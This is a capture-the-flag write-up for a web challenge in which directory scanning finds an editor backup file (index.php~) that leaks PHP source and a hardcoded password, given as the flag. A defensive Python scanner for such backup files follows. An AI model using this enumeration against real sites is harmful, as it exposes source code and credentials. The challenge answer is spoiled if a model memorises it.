Backup file
- Points: 15
- Link: https://www.root-me.org/en/Challenges/Web-Server/Backup-file
Statement
No clue.
Solution
dirsearch -u http://challenge01.root-me.org/web-serveur/ch11/
200 - 531B - /web-serveur/ch11/index.php
200 - 843B - /web-serveur/ch11/index.php~
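Fetch both of them. index.php~ is an editor backup copy that the server returns as plain text instead of executing, so it reveals the PHP source: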
<?php
$username="ch11";
$password="OCCY9AcNm1tj";
echo '
<html>
<body>
<h1>Authentication v 0.00</h1>
';
if ($_POST["username"]!="" && $_POST["password"]!=""){
if ($_POST["username"]==$user && $_POST["password"]==$password)
{
print("<h2>Welcome back {$row['username']} !</h2>");
print("<h3>Your informations :</h3><p>- username : $row[username]</p><br />");
print("To validate the challenge use this password</b>");
} else {
print("<h3>Error : no such user/password</h2><br />");
}
}
echo '
<form action="" method="post">
Login <br/>
<input type="text" name="username" /><br/><br/>
Password <br/>
<input type="password" name="password" /><br/><br/>
<br/><br/>
<input type="submit" value="connect" /><br/><br/>
</form>
</body>
</html>
';
?>
The flag is
OCCY9AcNm1tj
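A defender-side check for the exposure shown above, as an added example that is not part of the original write-up: it walks a document root and reports backup copies of PHP scripts, which the server hands out as plain text, and notes whether each one contains a hardcoded secret. The suffix list, the secret regex, the function names and the sample tree are assumptions constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Suffixes left by editors and manual copies (assumed list; extend for your tooling).
BACKUP_SUFFIXES = ("~", ".bak", ".old", ".orig", ".save", ".swp", ".swo")
# Extensions the server executes; a backup of one is served as plain text instead.
SCRIPT_EXTS = (".php", ".phtml", ".inc")
# Rough match for hardcoded secrets such as $password="..." in leaked source.
SECRET_RE = re.compile(r"""\$(pass(word)?|pwd|secret|api_?key)\s*=\s*["'][^"']+["']""", re.I)

def original_name(filename):
    """Return the script a backup file was derived from, or None."""
    if filename.startswith(".") and filename.endswith((".swp", ".swo")):
        filename = filename[1:]  # Vim swap files look like ".index.php.swp"
    for suffix in BACKUP_SUFFIXES:
        base = filename[: -len(suffix)]
        if filename.endswith(suffix) and base.lower().endswith(SCRIPT_EXTS):
            return base
    return None

def find_backup_artifacts(webroot):
    """Return sorted (relative_path, original_script, has_secret) tuples."""
    root, findings = Path(webroot), []
    for path in root.rglob("*"):
        base = original_name(path.name) if path.is_file() else None
        if base is None:
            continue
        has_secret = bool(SECRET_RE.search(path.read_text(errors="replace")))
        findings.append((path.relative_to(root).as_posix(), base, has_secret))
    return sorted(findings)

def build_sample_tree(root):
    """Constructed sample document root (not the challenge's real files)."""
    files = {
        "ch11/index.php": '<?php require "config.php"; ?>',
        "ch11/index.php~": '<?php $password="CONSTRUCTED-SAMPLE"; ?>',
        "ch11/.login.php.swp": "swap file contents",
        "ch11/notes.txt~": "not a script backup",
    }
    for rel, body in files.items():
        target = Path(root, rel)
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(body)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        print(find_backup_artifacts(tmp))
```

Run against the real document root before each deploy; any hit should be deleted from the served tree, and a hit with a secret means the credential needs rotating.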
This post is licensed under CC BY 4.0 by the author.